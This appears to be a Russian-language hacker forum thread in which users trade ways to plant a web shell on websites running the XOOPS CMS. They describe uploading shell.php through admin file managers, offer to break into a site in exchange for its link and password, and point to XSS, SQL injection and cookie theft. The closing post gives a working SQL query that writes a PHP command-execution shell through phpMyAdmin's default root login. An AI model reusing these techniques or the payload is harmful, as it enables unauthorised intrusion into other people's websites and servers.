вообщем, кто подкажет как залить шелл через xoops? я с ним не сталкивался, поэтому спрашиваю здесь, мож кто знает?
Я выкладывал вроде пару шеллов на xoops. Где то ещё пассы на пару сайтов валяются. В общем там всё время подключены разные модули. Ни одного одинакового сайта пока не видел. Я заливал с подключеным файл-менеджером, а без менеджера пока руки не дошли, собственно и не пробовал сильно. Эт, скинь линк и пас в личку, придумаем может что-нибудь. Tut odin iz nix, moget pomoget http://forum.antichat.ru/showthread.php?p=75562
new_bb стоит? если да то там хсс должна быть sql-inj на safety-lab.com посмотри я через форум ломал щас хупс вроде как Run CMs все также осталось там в админку без пароля только куки украсть ---------- 2азазель ето где *.php.ns ты так делал? ето некатит уже а вообще больше всего уязвимостей на их форуме они постоянно там выкладывабт как их сломали логи и т.д. чтобы админы заплатки сделали
Я ж грю. В админке сайта был какой то дурацкий файловый менеджер через который можно было закачивать файлы только в одну папку, типа site.com/xoops/eta/dalekaya/papka/blablabla/tatata/shell.php Я ещё заколебался её искать. Потом я нашёл ещё штук пять таких xopsoв, но админки были одна не похожа на другую и менеджера такого я больше не видел. И форумы тоже там разные были прилеплены.
идешь в phpmyadmin по стандарту рут и ебашишь sql запросов вот эту хню SELECT '<? system("$_GET[cmd]"); ?>' FROM mysql.user INTO OUTFILE 'дира до файла' или можешь залить полноценный шелл тока замени ' на " во всем сшеле...
